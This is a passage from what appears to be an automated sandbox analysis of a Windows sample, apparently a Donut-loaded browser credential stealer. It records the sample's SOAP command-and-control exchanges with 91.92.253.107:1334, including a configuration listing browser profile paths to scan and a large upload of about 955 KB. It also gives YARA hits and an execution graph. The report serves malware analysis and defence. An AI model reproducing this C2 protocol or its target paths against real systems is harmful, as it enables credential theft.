            Sep 5, 2024 20:25:31.661708117 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661710978 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661714077 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661722898 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661819935 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661828041 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661835909 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661839962 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661847115 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661856890 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661864996 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661874056 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661886930 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661895990 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661902905 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661920071 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661926985 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661935091 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661942005 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661951065 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661958933 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661967993 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.661974907 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662054062 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662062883 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662069082 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662077904 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662081003 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662084103 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662094116 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662102938 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662111998 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662116051 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662123919 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662177086 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662184954 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662192106 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662195921 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662203074 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662211895 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662220001 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662228107 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662231922 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662234068 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662241936 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662266970 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662275076 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662278891 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662281990 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662288904 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662297010 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.662303925 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:31.703773975 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:32.629164934 CEST13344973391.92.253.107192.168.2.4
            Sep 5, 2024 20:25:32.672234058 CEST497331334192.168.2.491.92.253.107
            Sep 5, 2024 20:25:32.979829073 CEST497331334192.168.2.491.92.253.107
            TimestampSource PortDest PortSource IPDest IP
            Sep 5, 2024 20:25:20.574471951 CEST6301353192.168.2.41.1.1.1
            Sep 5, 2024 20:26:00.524163961 CEST5362003162.159.36.2192.168.2.4
            Sep 5, 2024 20:26:00.990633965 CEST53585131.1.1.1192.168.2.4
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Sep 5, 2024 20:25:20.574471951 CEST192.168.2.41.1.1.10x8f6fStandard query (0)api.ip.sbA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Sep 5, 2024 20:25:20.581598043 CEST1.1.1.1192.168.2.40x8f6fNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
            • 91.92.253.107:1334
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.44973091.92.253.10713347056C:\Users\user\Desktop\file.exe
            TimestampBytes transferredDirectionData
            Sep 5, 2024 20:25:14.505373001 CEST239OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
            Host: 91.92.253.107:1334
            Content-Length: 137
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive
            Sep 5, 2024 20:25:15.092840910 CEST359INHTTP/1.1 200 OK
            Content-Length: 212
            Content-Type: text/xml; charset=utf-8
            Server: Microsoft-HTTPAPI/2.0
            Date: Thu, 05 Sep 2024 18:25:14 GMT
            Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
            Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
            Sep 5, 2024 20:25:20.132107973 CEST222OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
            Host: 91.92.253.107:1334
            Content-Length: 144
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Sep 5, 2024 20:25:20.299477100 CEST25INHTTP/1.1 100 Continue
            Sep 5, 2024 20:25:20.404280901 CEST1236INHTTP/1.1 200 OK
            Content-Length: 4744
            Content-Type: text/xml; charset=utf-8
            Server: Microsoft-HTTPAPI/2.0
            Date: Thu, 05 Sep 2024 18:25:20 GMT
            Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
            Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.44973291.92.253.10713347056C:\Users\user\Desktop\file.exe
            TimestampBytes transferredDirectionData
            Sep 5, 2024 20:25:29.301563025 CEST220OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
            Host: 91.92.253.107:1334
            Content-Length: 955746
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Sep 5, 2024 20:25:31.158516884 CEST294INHTTP/1.1 200 OK
            Content-Length: 147
            Content-Type: text/xml; charset=utf-8
            Server: Microsoft-HTTPAPI/2.0
            Date: Thu, 05 Sep 2024 18:25:31 GMT
            Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
            Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.44973391.92.253.10713347056C:\Users\user\Desktop\file.exe
            TimestampBytes transferredDirectionData
            Sep 5, 2024 20:25:31.185662031 CEST240OUTPOST / HTTP/1.1
            Content-Type: text/xml; charset=utf-8
            SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
            Host: 91.92.253.107:1334
            Content-Length: 955738
            Expect: 100-continue
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive
            Sep 5, 2024 20:25:32.629164934 CEST408INHTTP/1.1 200 OK
            Content-Length: 261
            Content-Type: text/xml; charset=utf-8
            Server: Microsoft-HTTPAPI/2.0
            Date: Thu, 05 Sep 2024 18:25:32 GMT
            Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
            Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:14:25:12
            Start date:05/09/2024
            Path:C:\Users\user\Desktop\file.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\Desktop\file.exe"
            Imagebase:0x7ff6aac90000
            File size:2'208'256 bytes
            MD5 hash:6A94B94BA557D5D85A1DA20213D48974
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1955043289.000001D60971C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1954884538.000001D6096B7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            Reputation:low
            Has exited:true

            Target ID:4
            Start time:14:25:32
            Start date:05/09/2024
            Path:C:\Windows\System32\WerFault.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\WerFault.exe -u -p 7056 -s 2356
            Imagebase:0x7ff693ba0000
            File size:570'736 bytes
            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Reset < >

              Execution Graph

              Execution Coverage:9.5%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:36.3%
              Total number of Nodes:91
              Total number of Limit Nodes:5
              execution_graph 2058 1d6098c99f3 VirtualProtect 2059 1d6098c9a0b 2058->2059 2060 1d6098c99ab 2058->2060 2061 1d6098c9a19 VirtualProtect 2059->2061 2067 1d6098cc31c 2061->2067 2064 1d6098c9a5c VirtualProtect 2064->2060 2065 1d6098c9a75 2064->2065 2066 1d6098c9a83 VirtualProtect 2065->2066 2066->2060 2068 1d6098cc352 2067->2068 2069 1d6098c9a41 2067->2069 2068->2069 2071 1d6098ca188 2068->2071 2069->2060 2069->2064 2073 1d6098ca1cb 2071->2073 2076 1d6098ca1f4 2071->2076 2074 1d6098ca204 2073->2074 2075 1d6098cc31c LoadLibraryA 2073->2075 2073->2076 2074->2069 2075->2073 2076->2074 2077 1d6098cc234 2076->2077 2078 1d6098cc252 2077->2078 2079 1d6098cc2fd LoadLibraryA 2078->2079 2080 1d6098cc305 2078->2080 2079->2080 2080->2074 2081 1d6098caa1c 2110 1d6098cc4c4 2081->2110 2084 1d6098cc4c4 LoadLibraryA 2085 1d6098caa58 2084->2085 2086 1d6098cc4c4 LoadLibraryA 2085->2086 2087 1d6098caa6e 2086->2087 2088 1d6098caa80 VirtualAlloc 2087->2088 2089 1d6098caa99 2087->2089 2088->2089 2090 1d6098caac5 2088->2090 2091 1d6098cc4c4 LoadLibraryA 2090->2091 2095 1d6098cad21 2090->2095 2093 1d6098cab39 2091->2093 2092 1d6098cabd0 2092->2095 2109 1d6098cac58 2092->2109 2130 1d6098c9984 2092->2130 2093->2089 2096 1d6098cc234 LoadLibraryA 2093->2096 2098 1d6098cab90 2093->2098 2094 1d6098cc4c4 LoadLibraryA 2094->2098 2097 1d6098caddc VirtualFree 2095->2097 2108 1d6098cad7d 2095->2108 2096->2093 2097->2089 2098->2092 2098->2094 2098->2095 2100 1d6098cad69 2144 1d6098cb228 2100->2144 2101 1d6098cad19 2101->2095 2123 1d6098ca7a8 2101->2123 2102 1d6098cac2e 2104 1d6098cac32 2102->2104 2114 1d6098c9ab0 2102->2114 2104->2095 2104->2102 2108->2108 2109->2095 2109->2100 2109->2101 2111 1d6098cc4fb 2110->2111 2112 1d6098caa45 2111->2112 2154 1d6098c9fd0 2111->2154 2112->2084 2115 1d6098cc234 LoadLibraryA 2114->2115 2116 1d6098c9ace 2115->2116 2117 1d6098cc31c LoadLibraryA 2116->2117 2118 1d6098c9ae3 2117->2118 2119 1d6098c9aeb VirtualProtect 2118->2119 2120 1d6098c9b2d 2118->2120 2119->2120 2121 1d6098c9b05 2119->2121 2120->2095 2120->2109 2122 1d6098c9b17 VirtualProtect 2121->2122 2122->2120 2124 1d6098ca7e5 CLRCreateInstance 2123->2124 2126 1d6098ca7fe 2123->2126 2124->2126 2125 1d6098ca8ad 2125->2095 2126->2125 2127 1d6098ca90b SysAllocString 2126->2127 2128 1d6098ca8df 2126->2128 2127->2128 2128->2125 2129 1d6098ca95d SafeArrayCreate 2128->2129 2129->2125 2131 1d6098cc234 LoadLibraryA 2130->2131 2132 1d6098c99a3 2131->2132 2133 1d6098c99ab 2132->2133 2134 1d6098cc31c LoadLibraryA 2132->2134 2133->2102 2135 1d6098c99ca 2134->2135 2135->2133 2136 1d6098c99ed VirtualProtect 2135->2136 2136->2133 2137 1d6098c9a0b 2136->2137 2138 1d6098c9a19 VirtualProtect 2137->2138 2139 1d6098cc31c LoadLibraryA 2138->2139 2140 1d6098c9a41 2139->2140 2140->2133 2141 1d6098c9a5c VirtualProtect 2140->2141 2141->2133 2142 1d6098c9a75 2141->2142 2143 1d6098c9a83 VirtualProtect 2142->2143 2143->2133 2148 1d6098cb27c 2144->2148 2145 1d6098cc234 LoadLibraryA 2145->2148 2146 1d6098cc234 LoadLibraryA 2147 1d6098cb6d9 2146->2147 2147->2146 2150 1d6098cc31c LoadLibraryA 2147->2150 2151 1d6098cb778 2147->2151 2148->2145 2148->2147 2149 1d6098cc31c LoadLibraryA 2148->2149 2153 1d6098cbab0 2148->2153 2149->2148 2150->2147 2151->2153 2158 1d6098cbfd8 2151->2158 2153->2095 2155 1d6098ca010 2154->2155 2157 1d6098ca0a7 2154->2157 2156 1d6098ca188 LoadLibraryA 2155->2156 2155->2157 2156->2157 2157->2111 2161 1d6098cc014 2158->2161 2159 1d6098cc210 2159->2153 2160 1d6098cc31c LoadLibraryA 2160->2161 2161->2159 2161->2160

              Callgraph

              • Executed
              • Not Executed
              • Opacity -> Relevance
              • Disassembly available
              callgraph 0 Function_000001D6098CDDA4 3 Function_000001D6098CD098 0->3 9 Function_000001D6098CF5C3 0->9 11 Function_000001D6098CF7C0 0->11 13 Function_000001D6098CF4B8 0->13 14 Function_000001D6098CE4D4 0->14 22 Function_000001D6098CF7E4 0->22 58 Function_000001D6098CCF34 0->58 59 Function_000001D6098CD02F 0->59 63 Function_000001D6098CED42 0->63 73 Function_000001D6098CF152 0->73 79 Function_000001D6098CF34B 0->79 86 Function_000001D6098CD661 0->86 90 Function_000001D6098CE174 0->90 97 Function_000001D6098CDB95 0->97 98 Function_000001D6098CF38E 0->98 1 Function_000001D6098CCAA0 2 Function_000001D6098CF79D 92 Function_000001D6098CF766 2->92 3->11 3->13 3->22 3->98 4 Function_000001D6098CA6B4 5 Function_000001D6098C9AB0 54 Function_000001D6098CC31C 5->54 57 Function_000001D6098CC234 5->57 65 Function_000001D6098CCA44 5->65 6 Function_000001D6098CD7AC 61 Function_000001D6098CF12D 6->61 83 Function_000001D6098CF148 6->83 7 Function_000001D6098CA6A8 8 Function_000001D6098CA7A8 9->2 9->92 10 Function_000001D6098CC4C4 15 Function_000001D6098C9FD0 10->15 12 Function_000001D6098CDAB8 14->11 14->22 27 Function_000001D6098CDAF3 14->27 31 Function_000001D6098CF1F0 14->31 36 Function_000001D6098CEF05 14->36 41 Function_000001D6098CF7F9 14->41 14->61 14->73 71 Function_000001D6098CC538 15->71 104 Function_000001D6098CA188 15->104 16 Function_000001D6098CDAD0 17 Function_000001D6098B01D2 18 Function_000001D6098CCACA 18->0 18->79 18->83 19 Function_000001D6098CA6C8 94 Function_000001D6098CCA80 19->94 20 Function_000001D6098CA3C8 21 Function_000001D6098CC7C8 47 Function_000001D6098CCA0C 21->47 23 Function_000001D6098CDAE0 24 Function_000001D6098CBCDC 24->20 84 Function_000001D6098CCA64 24->84 25 Function_000001D6098CCCD9 26 Function_000001D6098CBFD8 26->54 26->65 75 Function_000001D6098CA754 26->75 27->41 28 Function_000001D6098C99F3 28->54 28->65 29 Function_000001D6098CD5F5 29->31 29->73 30 Function_000001D6098CCCEE 31->29 31->41 32 Function_000001D6098CCBEC 33 Function_000001D6098CCCE9 34 Function_000001D6098CA302 35 Function_000001D6098CCC03 35->83 36->11 36->31 76 Function_000001D6098CDB54 36->76 37 Function_000001D6098CC604 38 Function_000001D6098CD6FF 39 Function_000001D6098CCBFB 40 Function_000001D6098CADF8 42 Function_000001D6098CCF15 43 Function_000001D6098CD70E 44 Function_000001D6098B0014 45 Function_000001D6098B0112 46 Function_000001D6098B0008 48 Function_000001D6098CCF09 49 Function_000001D6098CA324 50 Function_000001D6098CCF1F 51 Function_000001D6098CD71E 52 Function_000001D6098CF820 53 Function_000001D6098CAA1C 53->5 53->8 53->10 53->21 53->24 53->40 53->57 62 Function_000001D6098CB228 53->62 53->65 66 Function_000001D6098C9B40 53->66 70 Function_000001D6098CA238 53->70 53->71 53->84 93 Function_000001D6098C9984 53->93 96 Function_000001D6098CC678 53->96 54->94 54->104 55 Function_000001D6098CD716 56 Function_000001D6098CA618 57->1 58->11 58->31 58->73 58->83 59->11 59->31 59->73 60 Function_000001D6098CCF2B 62->19 62->26 62->54 62->57 62->65 62->84 62->94 63->6 63->22 63->35 63->61 81 Function_000001D6098CCD4D 63->81 64 Function_000001D6098CD742 66->65 66->71 66->84 66->96 67 Function_000001D6098CCE3B 67->22 68 Function_000001D6098CD73A 69 Function_000001D6098CCE36 71->37 71->84 72 Function_000001D6098CCD38 73->52 74 Function_000001D6098CF455 77 Function_000001D6098B0254 78 Function_000001D6098CD450 78->29 78->98 79->78 80 Function_000001D6098CF14D 81->83 82 Function_000001D6098CDA47 83->80 85 Function_000001D6098B0264 87 Function_000001D6098CA360 88 Function_000001D6098B0162 89 Function_000001D6098CA374 90->61 91 Function_000001D6098CD76C 93->54 93->57 93->65 95 Function_000001D6098CCC7A 97->61 98->22 98->74 99 Function_000001D6098B0093 100 Function_000001D6098CCE8B 101 Function_000001D6098CCE86 102 Function_000001D6098CD786 103 Function_000001D6098CA688 104->54 104->57

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 99 1d6098caa1c-1d6098caa74 call 1d6098cc4c4 * 3 106 1d6098caaa6 99->106 107 1d6098caa76-1d6098caa79 99->107 108 1d6098caaa9-1d6098caac4 106->108 107->106 109 1d6098caa7b-1d6098caa7e 107->109 109->106 110 1d6098caa80-1d6098caa97 VirtualAlloc 109->110 111 1d6098caac5-1d6098caaee call 1d6098cca44 call 1d6098cca64 110->111 112 1d6098caa99-1d6098caaa0 110->112 118 1d6098caaf0-1d6098cab24 call 1d6098cc678 call 1d6098cc538 111->118 119 1d6098cab2a-1d6098cab40 call 1d6098cc4c4 111->119 112->106 113 1d6098caaa2 112->113 113->106 118->119 130 1d6098cad7f-1d6098cad80 118->130 119->106 124 1d6098cab46-1d6098cab47 119->124 126 1d6098cab4d-1d6098cab53 124->126 128 1d6098cab55 126->128 129 1d6098cab90-1d6098cab9b 126->129 131 1d6098cab57-1d6098cab59 128->131 133 1d6098cabd0-1d6098cabd9 129->133 134 1d6098cab9d-1d6098cabb7 call 1d6098cc4c4 129->134 132 1d6098cad85-1d6098cad96 130->132 137 1d6098cab72-1d6098cab74 131->137 138 1d6098cab5b-1d6098cab61 131->138 139 1d6098cad98-1d6098cada2 132->139 140 1d6098cadc9-1d6098cadea call 1d6098cca64 VirtualFree 132->140 135 1d6098cabfa-1d6098cac03 133->135 136 1d6098cabdb-1d6098cabeb call 1d6098c9b40 133->136 155 1d6098cabc6-1d6098cabce 134->155 156 1d6098cabb9-1d6098cabc0 134->156 135->132 145 1d6098cac09-1d6098cac13 135->145 136->132 157 1d6098cabf1-1d6098cabf8 136->157 137->129 146 1d6098cab76-1d6098cab8e call 1d6098cc234 137->146 138->137 143 1d6098cab63-1d6098cab70 138->143 139->140 144 1d6098cada4-1d6098cadc2 call 1d6098cca64 139->144 162 1d6098cadf0-1d6098cadf2 140->162 163 1d6098cadec 140->163 143->131 143->137 144->140 151 1d6098cac15-1d6098cac16 145->151 152 1d6098cac1d-1d6098cac24 145->152 146->126 151->152 159 1d6098cac26-1d6098cac27 152->159 160 1d6098cac58-1d6098cac5c 152->160 155->133 155->134 156->130 156->155 157->152 166 1d6098cac29 call 1d6098c9984 159->166 164 1d6098cac62-1d6098cac8b 160->164 165 1d6098cad0f-1d6098cad17 160->165 162->108 163->162 164->132 179 1d6098cac91-1d6098cacab call 1d6098cca44 164->179 167 1d6098cad69-1d6098cad6f call 1d6098cb228 165->167 168 1d6098cad19-1d6098cad1f 165->168 170 1d6098cac2e-1d6098cac30 166->170 177 1d6098cad74-1d6098cad7b 167->177 172 1d6098cad21-1d6098cad27 168->172 173 1d6098cad36-1d6098cad48 call 1d6098ca7a8 168->173 175 1d6098cac32-1d6098cac39 170->175 176 1d6098cac3f-1d6098cac42 call 1d6098c9ab0 170->176 172->177 178 1d6098cad29-1d6098cad34 call 1d6098cbcdc 172->178 190 1d6098cad5a-1d6098cad67 call 1d6098ca238 173->190 191 1d6098cad4a-1d6098cad55 call 1d6098cadf8 173->191 175->132 175->176 182 1d6098cac47-1d6098cac49 176->182 177->132 183 1d6098cad7d 177->183 178->177 192 1d6098cacad-1d6098cacb0 179->192 193 1d6098cacc7-1d6098cad0a 179->193 182->160 187 1d6098cac4b-1d6098cac52 182->187 183->183 187->132 187->160 190->177 191->190 192->165 196 1d6098cacb2-1d6098cacc5 call 1d6098cc7c8 192->196 193->132 200 1d6098cad0c-1d6098cad0d 193->200 196->200 200->165
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1955852454.000001D6098B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 000001D6098B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1d6098b0000_file.jbxd
              Yara matches
              Similarity
              • API ID: Virtual$AllocFree
              • String ID:
              • API String ID: 2087232378-0
              • Opcode ID: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
              • Instruction ID: f5b99b2b8197865502a0c20e0a45300b0a1618557c95df2a7c01c6c8e654c59a
              • Opcode Fuzzy Hash: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
              • Instruction Fuzzy Hash: D0C15370614D094BEB5DEA28C4957EAB3D2FB98301F184F6BE44AC7386DB34E9418A81
              Strings
              Memory Dump Source
              • Source File: 00000000.00000003.1835013827.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_3_7ffd9b8b0000_file.jbxd
              Similarity
              • API ID:
              • String ID: !
              • API String ID: 0-764669442
              • Opcode ID: 895c06f2e7841e657e485126bed9e301430d9d2feda8f1463d74e2e0f22ea7a9
